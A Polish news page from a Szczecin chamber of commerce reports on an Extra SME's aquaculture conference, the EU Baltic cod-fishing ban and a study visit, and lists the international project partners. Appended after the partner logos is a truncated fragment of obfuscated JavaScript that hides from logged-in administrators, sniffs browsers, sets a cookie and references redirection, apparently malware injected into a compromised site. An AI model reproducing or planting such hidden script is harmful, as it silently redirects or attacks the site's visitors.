Wizyta studyjna branży rybołówstwa – Projekt EXTRA SME’s | Północna Izba Gospodarcza w Koszalinie

26 – 27 listopada w Północnej Izbie Gospodarczej odbyło się spotkanie poświęcone branży akwakultury. W spotkaniu wzięli udział przedsiębiorcy oraz eksperci z branży zarówno z Polski jak i Grecji, Litwy, Włoch czy Irlandii. Pierwszego dnia zostały poruszone tematy takie jak szanse i zagrożenia w branży, kryzys Bałtyckiego rybołówstwa czy nowe technologie w akwakulturze. Drugiego dnia odbyła się wizyta studyjna, w której przedsiębiorcy mieli okazję odwiedzić firmę „Jurassic Salmon”.

Jak rozwijać akwakulturę na Pomorzu Zachodnim i w całej Europie? Gorąca dyskusja w Północnej Izbie Gospodarczej

Ożywiona dyskusja na temat sytuacji na Morzu Bałtyckim, ale i przedstawienie przedsiębiorcom szans na rozwój branży morskiej i szeroko rozumianej akwakultury – taki przebieg miało spotkanie zorganizowane w siedzibie Północnej Izby Gospodarczej w Szczecinie. Wydarzenie zrealizowane zostało w ramach międzynarodowego projektu Extra SME’S.

„Temat akwakultury ciągle zyskuje na zainteresowaniu”

Północna Izba Gospodarcza w Szczecinie realizuje szereg projektów międzynarodowych z różnych dziedzin. Ich celem jest aktywizacja gospodarki w kontekście międzynarodowym i umożliwianie zachodniopomorskim firmom ekspansji na rynki zagraniczne. 26 listopada odbyła się konferencja, której celem była promocja akwakultury, realizowana była ona w ramach projektu Extra SME’s. Zadaniem projektu jest wsparcie branży akwakultury, a przede wszystkim poprawa polityki mającej na celu zwiększenie konkurencyjności i ekstrawersji małych i średnich przedsiębiorstw na obszarach przybrzeżnych i wiejskich UE, w których akwakultura jest siłą napędową gospodarki regionalnej:

– Promujemy produkty, innowacyjne technologie w zakresie akwakultury i branży morskiej oraz zachęcamy do podjęcia dyskusji na temat bieżących problemów w Polsce i w Europie jeżeli chodzi o branżę morską i rybołówstwo. Temat akwakultury ciągle zyskuje na zainteresowaniu, choć w każdym kraju w Europie ogniska problemowe mogą być nieco inne, stąd też bardzo żywa i ciekawa dyskusja w siedzibie Północnej Izby Gospodarczej. Udało nam się zaprosić gości z innych krajów: z Grecji, Irlandii, Rumunii, Włoch i Litwy. Nie brakuje także specjalistów z Polski – mówi Jacek Wójcik, koordynator projektów międzynarodowych w Północnej Izbie Gospodarczej w Szczecinie.

Wypracowanie wspólnego głosu nie jest łatwe, ale realizacja dotychczasowych projektów międzynarodowych pokazuje, że jak najbardziej jest możliwe, a przedsiębiorcy z województwa zachodniopomorskiego współpracujący z Północną Izbą Gospodarczą chętnie zabierają głos w najistotniejszych sprawach: – Chcemy lobbować za dobrymi rozwiązaniami dla przedsiębiorców na forum Unii Europejskiej. Zgłaszana podczas dyskusji problematyka dotyczy unijnych obostrzeń np. zakaz połowu dorsza, który mocno dotyka naszych rybaków – dodaje Jacek Wójcik.

Promocja akwakultury w wykonaniu Północnej Izby Gospodarczej to jednak nie tylko organizacja spotkania, ale i szereg innych działań, które mają na celu integracje przedsiębiorców z tej branży i zachęcanie ich do podejmowania kolejnych wyzwań. W projekt EXTRA SME’s zaangażowanych jest wiele krajów na świecie, stąd perspektywy są bardzo obiecujące.

Kryzys na Bałtyku jednym z głównych tematów spotkania. Przedsiębiorcy żywo zainteresowani

Ponad 90% przedsiębiorstw w regionach EXTRA-MŚP to śródlądowe i przybrzeżne MŚP działające w całym łańcuchu wartości w sektorze akwakultury, przyczyniające się do wzrostu gospodarczego i tworzenia miejsc pracy. Globalny rynek wciąż jednak pozostaje zamknięty dla narodowych firm z wielu krajów. Tylko harmonijna współpraca, konsekwentny lobbing i oferowanie jak najlepszych usług i produktów może spowodować, że pewne „szklane sufity” zostaną pokonane. Realizacja międzynarodowego projektu przez Północną Izbę Gospodarczą stawia sobie za cel rozwój eksportu, zbliżanie przedsiębiorców do siebie i jeszcze aktywniejsze rozwijanie akwakultury na Pomorzu Zachodnim.

Wtorkowa dyskusja w Północnej Izbie Gospodarczej momentami miała dynamiczny przebieg, bo przypadała na czas poważnego kryzysu gospodarczego na Morzu Bałtyckim: – Podczas spotkania zasygnalizowaliśmy jako przedsiębiorcy i rybacy szereg problemów. Kryzys jest tematem nośnym, bo doprowadził wielu ludzi do bankructwa. Traktuje to spotkanie jako jedno z pierwszych, które mają na głos wyrazić nasze oburzenie. 15 października Komisja Europejska wprowadziła zakaz połowu dorsza na Bałtyku argumentując to właśnie kryzysową sytuacją naturalną, ale nie wskazano powodów kryzysu, poza tym, że „dzieje się coś złego”. Takie spotkania z przedsiębiorcami oraz z parterami z zagranicy są bardzo istotne – mówi Grzegorz Hałubek, Prezes Związku Rybaków Polskich i doradca Ministra Gospodarki Morskiej i Żeglugi Śródlądowej.

PARTNERZY PROJEKTU

Region Peloponez, Grecja – lider projektu
Region Liguria, Włochy
Północna Izba Gospodarcza w Szczecinie, Polska
Agencja Rozwoju Regionalnego Bukareszt-Ilfov, Rumunia
Lapland Uniwersytet Nauk Stosowanych, Finlandia
Uniwersytet w Patras, Grecja
Zachodnia Komisja Rozwoju, Irlandia
Liguria, Klaster Technologii Morskich, Włochy
Agencja Rozwoju Regionów Krajowych, Litwa
logointerreg europe logo quadri

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m